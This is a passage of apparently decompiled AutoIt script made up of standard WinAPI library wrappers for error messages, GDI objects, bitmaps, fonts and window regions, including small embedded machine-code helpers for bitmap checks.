$IERRORCODE ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , NULL ) ENDFUNC FUNC _WINAPI_SHOWERROR ($STEXT , $BEXIT = TRUE ) BLOCKINPUT (0 ) MSGBOX ($MB_SYSTEMMODAL , "Error" , $STEXT & " " ) IF $BEXIT THEN EXIT ENDFUNC FUNC _WINAPI_SHOWLASTERROR ($STEXT = "" , $BABORT = FALSE , $ILANGUAGE = 0 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $SERROR LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () WHILE 1 $SERROR = _WINAPI_GETERRORMESSAGE ($ILASTERROR , $ILANGUAGE ) IF @ERROR AND $ILANGUAGE THEN $ILANGUAGE = 0 ELSE EXITLOOP ENDIF WEND IF STRINGSTRIPWS ($STEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STEXT &= @CRLF & @CRLF ELSE $STEXT = "" ENDIF _WINAPI_MSGBOX (BITOR (262144 , BITSHIFT (16 , + 4294967294 * (NOT $ILASTERROR ) ) ) , $ILASTERROR , $STEXT & $SERROR ) IF $ILASTERROR THEN _WINAPI_SETLASTERROR ($ILASTERROR ) IF $BABORT THEN EXIT $ILASTERROR ENDIF ENDIF RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , 1 ) ENDFUNC FUNC _WINAPI_SHOWMSG ($STEXT ) _WINAPI_MSGBOX ($MB_SYSTEMMODAL , "Information" , $STEXT ) ENDFUNC FUNC __COMERRORFORMATING (BYREF $OCOMERROR , $SPREFIX = @TAB ) LOCAL CONST $STR_STRIPTRAILING = 2 LOCAL $SERROR = "COM Error encountered in " & @SCRIPTNAME & " (" & $OCOMERROR.Scriptline & ") :" & @CRLF & $SPREFIX & "Number " & @TAB & "= 0x" & HEX ($OCOMERROR.Number , 8 ) & " (" & $OCOMERROR.Number & ")" & @CRLF & $SPREFIX & "WinDescription" & @TAB & "= " & STRINGSTRIPWS ($OCOMERROR.WinDescription , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Description " & @TAB & "= " & STRINGSTRIPWS ($OCOMERROR.Description , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Source " & @TAB & "= " & $OCOMERROR.Source & @CRLF & $SPREFIX & "HelpFile " & @TAB & "= " & $OCOMERROR.HelpFile & @CRLF & $SPREFIX & "HelpContext " & @TAB & "= " & $OCOMERROR.HelpContext & @CRLF & $SPREFIX & "LastDllError " & @TAB & "= " & $OCOMERROR.LastDllError & @CRLF & $SPREFIX & "Retcode " & @TAB & "= 0x" & HEX ($OCOMERROR.retcode ) RETURN $SERROR ENDFUNC #Region Global Variables and Constants GLOBAL CONST $DUPLICATE_CLOSE_SOURCE = 1 GLOBAL CONST $DUPLICATE_SAME_ACCESS = 2 GLOBAL CONST $OBJ_BITMAP = 7 GLOBAL CONST $OBJ_BRUSH = 2 GLOBAL CONST $OBJ_COLORSPACE = 14 GLOBAL CONST $OBJ_DC = 3 GLOBAL CONST $OBJ_ENHMETADC = 12 GLOBAL CONST $OBJ_ENHMETAFILE = 13 GLOBAL CONST $OBJ_EXTPEN = 11 GLOBAL CONST $OBJ_FONT = 6 GLOBAL CONST $OBJ_MEMDC = 10 GLOBAL CONST $OBJ_METADC = 4 GLOBAL CONST $OBJ_METAFILE = 9 GLOBAL CONST $OBJ_PAL = 5 GLOBAL CONST $OBJ_PEN = 1 GLOBAL CONST $OBJ_REGION = 8 GLOBAL CONST $NULL_BRUSH = 5 GLOBAL CONST $NULL_PEN = 8 GLOBAL CONST $BLACK_BRUSH = 4 GLOBAL CONST $DKGRAY_BRUSH = 3 GLOBAL CONST $DC_BRUSH = 18 GLOBAL CONST $GRAY_BRUSH = 2 GLOBAL CONST $HOLLOW_BRUSH = $NULL_BRUSH GLOBAL CONST $LTGRAY_BRUSH = 1 GLOBAL CONST $WHITE_BRUSH = 0 GLOBAL CONST $BLACK_PEN = 7 GLOBAL CONST $DC_PEN = 19 GLOBAL CONST $WHITE_PEN = 6 GLOBAL CONST $ANSI_FIXED_FONT = 11 GLOBAL CONST $ANSI_VAR_FONT = 12 GLOBAL CONST $DEVICE_DEFAULT_FONT = 14 GLOBAL CONST $DEFAULT_GUI_FONT = 17 GLOBAL CONST $OEM_FIXED_FONT = 10 GLOBAL CONST $SYSTEM_FONT = 13 GLOBAL CONST $SYSTEM_FIXED_FONT = 16 GLOBAL CONST $DEFAULT_PALETTE = 15 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CLOSEHANDLE ($HOBJECT ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DELETEOBJECT ($HOBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "DeleteObject" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DUPLICATEHANDLE ($HSOURCEPROCESSHANDLE , $HSOURCEHANDLE , $HTARGETPROCESSHANDLE , $IDESIREDACCESS , $IINHERITHANDLE , $IOPTIONS ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "DuplicateHandle" , "handle" , $HSOURCEPROCESSHANDLE , "handle" , $HSOURCEHANDLE , "handle" , $HTARGETPROCESSHANDLE , "handle*" , 0 , "dword" , $IDESIREDACCESS , "bool" , $IINHERITHANDLE , "dword" , $IOPTIONS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [4 ] ENDFUNC FUNC _WINAPI_GETCURRENTOBJECT ($HDC , $ITYPE ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "handle" , "GetCurrentObject" , "handle" , $HDC , "uint" , $ITYPE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCURRENTPROCESS () LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetCurrentProcess" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETOBJECT ($HOBJECT , $ISIZE , $POBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetObjectW" , "handle" , $HOBJECT , "int" , $ISIZE , "struct*" , $POBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETOBJECTINFOBYHANDLE ($HOBJECT ) LOCAL $TAGPUBLIC_OBJECT_BASIC_INFORMATION = "ulong Attributes;ulong GrantedAcess;ulong HandleCount;ulong PointerCount;ulong Reserved[10]" LOCAL $TPOBI = DLLSTRUCTCREATE ($TAGPUBLIC_OBJECT_BASIC_INFORMATION ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "ZwQueryObject" , "handle" , $HOBJECT , "uint" , 0 , "struct*" , $TPOBI , "ulong" , DLLSTRUCTGETSIZE ($TPOBI ) , "ptr" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] FOR $I = 0 TO 3 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TPOBI , $I + 1 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETOBJECTNAMEBYHANDLE ($HOBJECT ) LOCAL $TAGUNICODE_STRING = "struct;ushort Length;ushort MaximumLength;ptr Buffer;endstruct" LOCAL $TAGPUBLIC_OBJECT_TYPE_INFORMATION = "struct;" & $TAGUNICODE_STRING & ";ulong Reserved[22];endstruct" LOCAL $TPOTI = DLLSTRUCTCREATE ($TAGPUBLIC_OBJECT_TYPE_INFORMATION & ";byte[32]" ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "ZwQueryObject" , "handle" , $HOBJECT , "uint" , 2 , "struct*" , $TPOTI , "ulong" , DLLSTRUCTGETSIZE ($TPOTI ) , "ulong*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $PDATA = DLLSTRUCTGETDATA ($TPOTI , 3 ) IF NOT $PDATA THEN RETURN SETERROR (11 , 0 , "" ) RETURN _WINAPI_GETSTRING ($PDATA ) ENDFUNC FUNC _WINAPI_GETOBJECTTYPE ($HOBJECT ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "dword" , "GetObjectType" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSTDHANDLE ($ISTDHANDLE ) IF $ISTDHANDLE < 0 OR $ISTDHANDLE > 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL CONST $AHANDLE [3 ] = [+ 4294967286 , + 4294967285 , + 4294967284 ] LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetStdHandle" , "dword" , $AHANDLE [$ISTDHANDLE ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSTOCKOBJECT ($IOBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "GetStockObject" , "int" , $IOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SELECTOBJECT ($HDC , $HGDIOBJ ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $HGDIOBJ ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETHANDLEINFORMATION ($HOBJECT , $IMASK , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetHandleInformation" , "handle" , $HOBJECT , "dword" , $IMASK , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants GLOBAL CONST $TAGBITMAP = "struct;long bmType;long bmWidth;long bmHeight;long bmWidthBytes;ushort bmPlanes;ushort bmBitsPixel;ptr bmBits;endstruct" GLOBAL CONST $TAGBITMAPV5HEADER = "struct;dword bV5Size;long bV5Width;long bV5Height;ushort bV5Planes;ushort bV5BitCount;dword bV5Compression;dword bV5SizeImage;long bV5XPelsPerMeter;long bV5YPelsPerMeter;dword bV5ClrUsed;dword bV5ClrImportant;dword bV5RedMask;dword bV5GreenMask;dword bV5BlueMask;dword bV5AlphaMask;dword bV5CSType;int bV5Endpoints[9];dword bV5GammaRed;dword bV5GammaGreen;dword bV5GammaBlue;dword bV5Intent;dword bV5ProfileData;dword bV5ProfileSize;dword bV5Reserved;endstruct" GLOBAL CONST $TAGDIBSECTION = $TAGBITMAP & ";" & $TAGBITMAPINFOHEADER & ";dword dsBitfields[3];ptr dshSection;dword dsOffset" GLOBAL CONST $TMPF_FIXED_PITCH = 1 GLOBAL CONST $TMPF_VECTOR = 2 GLOBAL CONST $TMPF_TRUETYPE = 4 GLOBAL CONST $TMPF_DEVICE = 8 GLOBAL CONST $__WINAPICONSTANT_FW_NORMAL = 400 GLOBAL CONST $__WINAPICONSTANT_DEFAULT_CHARSET = 1 GLOBAL CONST $__WINAPICONSTANT_OUT_DEFAULT_PRECIS = 0 GLOBAL CONST $__WINAPICONSTANT_CLIP_DEFAULT_PRECIS = 0 GLOBAL CONST $__WINAPICONSTANT_DEFAULT_QUALITY = 0 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_BITBLT ($HDESTDC , $IXDEST , $IYDEST , $IWIDTH , $IHEIGHT , $HSRCDC , $IXSRC , $IYSRC , $IROP ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "BitBlt" , "handle" , $HDESTDC , "int" , $IXDEST , "int" , $IYDEST , "int" , $IWIDTH , "int" , $IHEIGHT , "handle" , $HSRCDC , "int" , $IXSRC , "int" , $IYSRC , "dword" , $IROP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_COMBINERGN ($HRGNDEST , $HRGNSRC1 , $HRGNSRC2 , $ICOMBINEMODE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "CombineRgn" , "handle" , $HRGNDEST , "handle" , $HRGNSRC1 , "handle" , $HRGNSRC2 , "int" , $ICOMBINEMODE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_COPYBITMAP ($HBITMAP ) $HBITMAP = _WINAPI_COPYIMAGE ($HBITMAP , 0 , 0 , 0 , 8192 ) RETURN SETERROR (@ERROR , @EXTENDED , $HBITMAP ) ENDFUNC FUNC _WINAPI_COPYIMAGE ($HIMAGE , $ITYPE = 0 , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CopyImage" , "handle" , $HIMAGE , "uint" , $ITYPE , "int" , $IXDESIREDPIXELS , "int" , $IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEANDBITMAP ($HBITMAP ) LOCAL $IERROR = 0 , $HDIB = 0 $HBITMAP = _WINAPI_COPYBITMAP ($HBITMAP ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) DO LOCAL $ATDIB [2 ] $ATDIB [0 ] = DLLSTRUCTCREATE ($TAGDIBSECTION ) IF (NOT _WINAPI_GETOBJECT ($HBITMAP , DLLSTRUCTGETSIZE ($ATDIB [0 ] ) , $ATDIB [0 ] ) ) OR (DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmBitsPixel" ) <> 32 ) OR (DLLSTRUCTGETDATA ($ATDIB [0 ] , "biCompression" ) ) THEN $IERROR = 10 EXITLOOP ENDIF $ATDIB [1 ] = DLLSTRUCTCREATE ($TAGBITMAP ) $HDIB = _WINAPI_CREATEDIB (DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmWidth" ) , DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmHeight" ) , 1 ) IF NOT _WINAPI_GETOBJECT ($HDIB , DLLSTRUCTGETSIZE ($ATDIB [1 ] ) , $ATDIB [1 ] ) THEN $IERROR = 11 EXITLOOP ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , __ANDPROC () , "ptr" , 0 , "uint" , 0 , "wparam" , DLLSTRUCTGETPTR ($ATDIB [0 ] ) , "lparam" , DLLSTRUCTGETPTR ($ATDIB [1 ] ) ) IF @ERROR THEN $IERROR = @ERROR EXITLOOP ENDIF IF NOT $ARET [0 ] THEN $IERROR = 12 EXITLOOP ENDIF $IERROR = 0 UNTIL 1 _WINAPI_DELETEOBJECT ($HBITMAP ) IF $IERROR THEN IF $HDIB THEN _WINAPI_DELETEOBJECT ($HDIB ) ENDIF $HDIB = 0 ENDIF RETURN SETERROR ($IERROR , 0 , $HDIB ) ENDFUNC FUNC _WINAPI_CREATEBITMAP ($IWIDTH , $IHEIGHT , $IPLANES = 1 , $IBITSPERPEL = 1 , $PBITS = 0 ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateBitmap" , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $IPLANES , "uint" , $IBITSPERPEL , "struct*" , $PBITS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATECOMPATIBLEBITMAP ($HDC , $IWIDTH , $IHEIGHT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleBitmap" , "handle" , $HDC , "int" , $IWIDTH , "int" , $IHEIGHT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , $IBITSPERPEL = 32 , $TCOLORTABLE = 0 , $ICOLORCOUNT = 0 ) LOCAL $ARGBQ [2 ] , $ICOLORS , $TAGRGBQ SWITCH $IBITSPERPEL CASE 1 $ICOLORS = 2 CASE 4 $ICOLORS = 16 CASE 8 $ICOLORS = 256 CASE ELSE $ICOLORS = 0 ENDSWITCH IF $ICOLORS THEN IF NOT ISDLLSTRUCT ($TCOLORTABLE ) THEN SWITCH $IBITSPERPEL CASE 1 $ARGBQ [0 ] = 0 $ARGBQ [1 ] = 16777215 $TCOLORTABLE = _WINAPI_CREATEDIBCOLORTABLE ($ARGBQ ) CASE ELSE ENDSWITCH ELSE IF $ICOLORS > $ICOLORCOUNT THEN $ICOLORS = $ICOLORCOUNT ENDIF IF (NOT $ICOLORS ) OR ((4 * $ICOLORS ) > DLLSTRUCTGETSIZE ($TCOLORTABLE ) ) THEN RETURN SETERROR (20 , 0 , 0 ) ENDIF ENDIF $TAGRGBQ = ";dword aRGBQuad[" & $ICOLORS & "]" ELSE $TAGRGBQ = "" ENDIF LOCAL $TBITMAPINFO = DLLSTRUCTCREATE ($TAGBITMAPINFOHEADER & $TAGRGBQ ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biSize" , 40 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biWidth" , $IWIDTH ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biHeight" , $IHEIGHT ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biPlanes" , 1 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biBitCount" , $IBITSPERPEL ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biCompression" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biSizeImage" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biXPelsPerMeter" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biYPelsPerMeter" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biClrUsed" , $ICOLORS ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biClrImportant" , 0 ) IF $ICOLORS THEN IF ISDLLSTRUCT ($TCOLORTABLE ) THEN _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TBITMAPINFO , "aRGBQuad" ) , $TCOLORTABLE , 4 * $ICOLORS ) ELSE _WINAPI_ZEROMEMORY (DLLSTRUCTGETPTR ($TBITMAPINFO , "aRGBQuad" ) , 4 * $ICOLORS ) ENDIF ENDIF LOCAL $HBITMAP = _WINAPI_CREATEDIBSECTION (0 , $TBITMAPINFO , 0 , $__G_VEXT ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $HBITMAP ENDFUNC FUNC _WINAPI_CREATEDIBSECTION ($HDC , $TBITMAPINFO , $IUSAGE , BYREF $PBITS , $HSECTION = 0 , $IOFFSET = 0 ) $PBITS = 0 LOCAL $ARET = DLLCALL ("gdi32.dll" , "handle" , "CreateDIBSection" , "handle" , $HDC , "struct*" , $TBITMAPINFO , "uint" , $IUSAGE , "ptr*" , 0 , "handle" , $HSECTION , "dword" , $IOFFSET ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) $PBITS = $ARET [4 ] RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEDIBCOLORTABLE (CONST BYREF $ACOLORTABLE , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($ACOLORTABLE , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TCOLORTABLE = DLLSTRUCTCREATE ("dword[" & ($IEND - $ISTART + 1 ) & "]" ) LOCAL $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TCOLORTABLE , 1 , _WINAPI_SWITCHCOLOR (__RGB ($ACOLORTABLE [$I ] ) ) , $ICOUNT ) $ICOUNT += 1 NEXT RETURN $TCOLORTABLE ENDFUNC FUNC _WINAPI_CREATEFONT ($IHEIGHT , $IWIDTH , $IESCAPE = 0 , $IORIENTN = 0 , $IWEIGHT = $__WINAPICONSTANT_FW_NORMAL , $BITALIC = FALSE , $BUNDERLINE = FALSE , $BSTRIKEOUT = FALSE , $ICHARSET = $__WINAPICONSTANT_DEFAULT_CHARSET , $IOUTPUTPREC = $__WINAPICONSTANT_OUT_DEFAULT_PRECIS , $ICLIPPREC = $__WINAPICONSTANT_CLIP_DEFAULT_PRECIS , $IQUALITY = $__WINAPICONSTANT_DEFAULT_QUALITY , $IPITCH = 0 , $SFACE = "Arial" ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateFontW" , "int" , $IHEIGHT , "int" , $IWIDTH , "int" , $IESCAPE , "int" , $IORIENTN , "int" , $IWEIGHT , "dword" , $BITALIC , "dword" , $BUNDERLINE , "dword" , $BSTRIKEOUT , "dword" , $ICHARSET , "dword" , $IOUTPUTPREC , "dword" , $ICLIPPREC , "dword" , $IQUALITY , "dword" , $IPITCH , "wstr" , $SFACE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEFONTINDIRECT ($TLOGFONT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateFontIndirectW" , "struct*" , $TLOGFONT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATERECTRGN ($ILEFTRECT , $ITOPRECT , $IRIGHTRECT , $IBOTTOMRECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateRectRgn" , "int" , $ILEFTRECT , "int" , $ITOPRECT , "int" , $IRIGHTRECT , "int" , $IBOTTOMRECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEROUNDRECTRGN ($ILEFTRECT , $ITOPRECT , $IRIGHTRECT , $IBOTTOMRECT , $IWIDTHELLIPSE , $IHEIGHTELLIPSE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateRoundRectRgn" , "int" , $ILEFTRECT , "int" , $ITOPRECT , "int" , $IRIGHTRECT , "int" , $IBOTTOMRECT , "int" , $IWIDTHELLIPSE , "int" , $IHEIGHTELLIPSE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATESOLIDBRUSH ($ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateSolidBrush" , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETBITMAPDIMENSION ($HBITMAP ) LOCAL $TOBJ = DLLSTRUCTCREATE ($TAGBITMAP ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "int" , "GetObject" , "handle" , $HBITMAP , "int" , DLLSTRUCTGETSIZE ($TOBJ ) , "struct*" , $TOBJ ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN _WINAPI_CREATESIZE (DLLSTRUCTGETDATA ($TOBJ , "bmWidth" ) , DLLSTRUCTGETDATA ($TOBJ , "bmHeight" ) ) ENDFUNC FUNC _WINAPI_GETSYSCOLORBRUSH ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetSysColorBrush" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETTEXTEXTENTPOINT32 ($HDC , $STEXT ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE ) LOCAL $ISIZE = STRINGLEN ($STEXT ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "GetTextExtentPoint32W" , "handle" , $HDC , "wstr" , $STEXT , "int" , $ISIZE , "struct*" , $TSIZE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_GETTEXTMETRICS ($HDC ) LOCAL $TTEXTMETRIC = DLLSTRUCTCREATE ($TAGTEXTMETRIC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "GetTextMetricsW" , "handle" , $HDC , "struct*" , $TTEXTMETRIC ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TTEXTMETRIC ENDFUNC FUNC _WINAPI_GETWINDOWRGN ($HWND , $HRGN ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetWindowRgn" , "hwnd" , $HWND , "handle" , $HRGN ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISALPHABITMAP ($HBITMAP ) $HBITMAP = _WINAPI_COPYBITMAP ($HBITMAP ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) LOCAL $ARET , $IERROR = 0 DO LOCAL $TDIB = DLLSTRUCTCREATE ($TAGDIBSECTION ) IF (NOT _WINAPI_GETOBJECT ($HBITMAP , DLLSTRUCTGETSIZE ($TDIB ) , $TDIB ) ) OR (DLLSTRUCTGETDATA ($TDIB , "bmBitsPixel" ) <> 32 ) OR (DLLSTRUCTGETDATA ($TDIB , "biCompression" ) ) THEN $IERROR = 1 EXITLOOP ENDIF $ARET = DLLCALL ("user32.dll" , "int" , "CallWindowProc" , "ptr" , __ALPHAPROC () , "ptr" , 0 , "uint" , 0 , "struct*" , $TDIB , "ptr" , 0 ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN $IERROR = @ERROR + 10 EXITLOOP ENDIF UNTIL 1 _WINAPI_DELETEOBJECT ($HBITMAP ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PTINRECT (BYREF $TRECT , BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "PtInRect" , "struct*" , $TRECT , "struct" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REDRAWWINDOW ($HWND , $TRECT = 0 , $HREGION = 0 , $IFLAGS = 5 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "RedrawWindow" , "hwnd" , $HWND , "struct*" , $TRECT , "handle" , $HREGION , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWRGN ($HWND , $HRGN , $BREDRAW = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "SetWindowRgn" , "hwnd" , $HWND , "handle" , $HRGN , "bool" , $BREDRAW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Embedded DLL Functions FUNC __ALPHAPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC = __INIT (BINARY ("0x48894C240848895424104C894424184C894C24205541574831C050504883EC28" & "48837C24600074054831C0EB0748C7C0010000004821C0751F488B6C24604883" & "7D180074054831C0EB0748C7C0010000004821C07502EB0948C7C001000000EB" & "034831C04821C0740C48C7C0FFFFFFFF4863C0EB6F48C744242800000000488B" & "6C24604C637D04488B6C2460486345084C0FAFF849C1E7024983C7FC4C3B7C24" & "287C36488B6C24604C8B7D184C037C24284983C7034C897C2430488B6C243080" & "7D0000740C48C7C0010000004863C0EB1348834424280471A54831C04863C0EB" & "034831C04883C438415F5DC3" ) ) ELSE $PPROC = __INIT (BINARY ("0x555331C05050837C241C00740431C0EB05B80100000021C075198B6C241C837D" & "1400740431C0EB05B80100000021C07502EB07B801000000EB0231C021C07407" & "B8FFFFFFFFEB4FC70424000000008B6C241C8B5D048B6C241C0FAF5D08C1E302" & "83C3FC3B1C247C288B6C241C8B5D14031C2483C303895C24048B6C2404807D00" & "007407B801000000EB0C8304240471BE31C0EB0231C083C4085B5DC21000" ) ) ENDIF ENDIF RETURN $PPROC ENDFUNC FUNC __ANDPROC () STATIC $PPROC = 0 IF NOT $PPROC THEN IF @AUTOITX64 THEN $PPROC 